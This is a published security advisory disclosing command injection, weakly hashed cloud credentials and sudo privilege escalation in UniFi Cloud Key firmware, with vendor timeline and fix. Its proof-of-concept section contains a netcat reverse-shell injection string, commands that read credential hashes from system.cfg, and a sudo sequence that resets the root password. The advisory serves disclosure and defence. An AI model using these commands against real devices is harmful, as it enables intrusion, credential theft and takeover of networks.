SEC Consult Vulnerability Lab Security Advisory < 20170727-0 >
=======================================================================
              title: Authenticated Command Injection &
                     Cloud User Weak Crypto & Privilege Escalation
            product: Ubiquiti Networks UniFi Cloud Key
 vulnerable version: Firmware v0.5.9/0.6.0
      fixed version: Firmware v0.6.1
         CVE number:
             impact: Critical
           homepage: https://www.ubnt.com
              found: 2017-01-31
                 by: T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Ubiquiti Networks develops high-performance networking
technology for service providers and enterprises. Our technology
platforms focus on delivering highly advanced and easily deployable
solutions that appeal to a global customer base in underserved and
underpenetrated markets."

Source: http://ir.ubnt.com/


Business recommendation:
------------------------
SEC Consult recommends not to use this device in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
-----------------------------------
1) Authenticated Command Injection & Cloud User Weak Crypto
The manual UniFi Cloud Key firmware upgrade function is prone to a command
injection vulnerability which can be exploited for example by sending a
manipulated upgrade link to a victim.

A reverse-shell can be used to get access to the device and this allows
an attacker to get access to the internal network of the attacked user.
The web user is "www-data" which has only few access and execution rights
but by exploiting vulnerability 2) it is possible to gain root access on
the device!

After a successful command injection the cloud user account password hash
can be dumped. Since the UniFi Cloud Key has to communicate with the access
points and configure their passwords as well, a hash has to be stored at
another place than /etc/shadow to persist the keys on the devices.
The hashes are stored in "system.cfg" using only MD5 hashing algorithm which
can be cracked easily in reasonable time.

This configuration file consists the username and the password hash of the
cloud user which is the same on all access points and the UniFi Cloud Key.

This configuration can be read by the user "www-data". Afterwards, the hash
can be cracked and the cloud user is hijacked. A remote-configuration of the
wireless lan of the user is now possible for an attacker.

2) Privilege Escalation
The password of the root user can be changed by a lower privileged user on
the device. This is possible because some binaries can be executed with sudo
by this user without the root password.


Proof of concept:
-----------------
1) Authenticated Command Injection & Cloud-User Hash Leak
The following PHP snipplet is responsible for the command execution:

(api.inc, line 476)
-------------------------------------------------------------------------------
exec(CMD_WGET . $url . CMD_WGET_OPTIONS, $out, $rc);
return CMD_WGET . $url . CMD_WGET_OPTIONS;
}
[...]
-------------------------------------------------------------------------------

The following link opens a reverse-shell:
;busybox nc <Attacker-IP> <Attacker-Port> -e /bin/bash;

To 'hide' the command from the eyes of the user in the upgrade window, one can
also decorate the link:
;busybox nc 192.168.3.142 8999 -e /bin/bash; https://secconsult.build-1337.bin

As listener, netcat was used:
$ nc -lvp <Attacker-Port>


To hijack the cloud account, steal username and password hash:
(user: www-data)
$ cd /srv/unifi/data/devices/uap/
$ ls
<serial-number-of-an-ap>
$ cd <serial-number-of-an-ap>
$ cat system.cfg | grep "users\.1\.name"
users.1.name=<username>
$ cat system.cfg | grep "users\.1\.password"
users.1.password=<password>

The root password hash in /etc/shadow is SHA-512 hashed, but in system.cfg
the same password is just MD5 hashed and can be cracked easily in reasonable
time.


2) Privilege Escalation
Because of the following line in /etc/sudoers.d/cloudkey-webui one can elevate
the rights of www-data to root:

(cloudkey-webui, line 1)
-------------------------------------------------------------------------------
www-data ALL=NOPASSWD:/sbin/ubnt-systool, /usr/bin/apt-get, /usr/sbin/service
unifi *, /usr/bin/java
-------------------------------------------------------------------------------

With the following commands one can change the root password without actually
knowing it:
(user: www-data)
$ cd /tmp
$ echo "root:password" > newfile.txt
$ /usr/bin/sudo /sbin/ubnt-systool chpasswd < newfile.txt

The root password is now changed to 'password'.
SSH login is also possible:
$ ssh root@<IP-Address>


Vulnerable / tested versions:
-----------------------------
Ubiquiti Networks UniFi Cloud Key version 0.5.9/0.6.0 has been tested.
This version was the latest at the time the security vulnerabilities
were discovered.


Vendor contact timeline:
------------------------
2017-02-03: Contacting vendor via HackerOne.
2017-02-05: Providing PoC video via HackerOne.
2017-02-06: Vendor sets status to "Triaged".
2017-02-21: Asking for a status update; No answer.
2017-03-01: Inform the vendor that the advisory will be published at
            2017-03-27; No answer.
2017-03-17: Asking for a status update.
2017-03-20: Vendor states that fix will be available in v0.6.1.
2017-03-21: Asking vendor when the update will be available. Found
            update on vendor homepage (available since 2017-03-20).
2017-03-21: Vendor asks for more time. Set release date to 2017-06-25.
2017-03-27: Fixed version is available - provide at least 90 days for
            customers to apply the patch.
2017-05-15: Contacted vendor via e-mail and set the publication date
            to 2017-06-27.
2017-06-26: Shifted publication date back to 2017-07-27 to provide more
            for customers to apply the patch.
2017-07-27: Public release of security advisory

Solution:
---------
Upgrade to firmware v0.6.1 or later.


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF T. Weber / @2017